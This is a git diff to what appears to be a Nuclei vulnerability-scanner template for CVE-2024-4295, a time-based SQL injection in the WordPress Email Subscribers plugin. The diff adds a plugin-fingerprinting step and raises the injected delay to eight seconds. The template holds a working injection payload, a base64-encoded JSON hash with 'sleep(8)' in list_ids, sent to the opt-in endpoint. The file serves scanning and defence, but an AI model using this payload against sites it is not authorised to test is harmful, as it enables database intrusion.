diff --git a/http/cves/2024/CVE-2024-4295.yaml b/http/cves/2024/CVE-2024-4295.yaml
index 2379d7f8d1a..b1be12381a7 100644
--- a/http/cves/2024/CVE-2024-4295.yaml
+++ b/http/cves/2024/CVE-2024-4295.yaml
@@ -31,23 +31,38 @@ info:
     fofa-query: body="/wp-content/plugins/email-subscribers/"
   tags: time-based-sqli,cve,cve2024,wordpress,wp-plugin,wp,email-subscribers,sqli
 
+flow: http(1) && http(2)
+
 variables:
   contact_id: "{{contact_id}}"
   email: "{{email}}"
-  rawhash: '{"message_id":0,"campaign_id":0,"contact_id":"{{contact_id}}","email":"{{email}}","guid":"dibwol-qaiebd-qvrgkp-lhyopm-rmyfzo","list_ids":["sleep(3)"],"action":"subscribe"}'
+  rawhash: '{"message_id":0,"campaign_id":0,"contact_id":"{{contact_id}}","email":"{{email}}","guid":"dibwol-qaiebd-qvrgkp-lhyopm-rmyfzo","list_ids":["sleep(8)"],"action":"subscribe"}'
 
 http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/wp-content/plugins/email-subscribers/readme.txt"
+
+    stop-at-first-match: true
+    host-redirects: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_any(body, "email-subscribers-", "Email Subscribers by Icegram Express")'
+        internal: true
+
   - raw:
       - |
         @timeout: 20s
         GET /?es=optin&hash={{ base64(rawhash) }} HTTP/1.1
         Host: {{Hostname}}
 
-    matchers-condition: and
     matchers:
       - type: dsl
         dsl:
-          - 'duration>=5'
+          - 'duration>=8'
           - 'contains(body, "You have been successfully subscribed")'
         condition: and
-# digest: 4a0a00473045022100ef84d71b771f0dcbd197ffad01746ecd151e0b2003a65b67dcadb27ecd0a473902206ff2fe02e08e414a0195191853ce7d2b232dfacdeea953c89af0b715987fe263:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ef84d71b771f0dcbd197ffad01746ecd151e0b2003a65b67dcadb27ecd0a473902206ff2fe02e08e414a0195191853ce7d2b232dfacdeea953c89af0b715987fe263:922c64590222798bb761d5b6d8e72950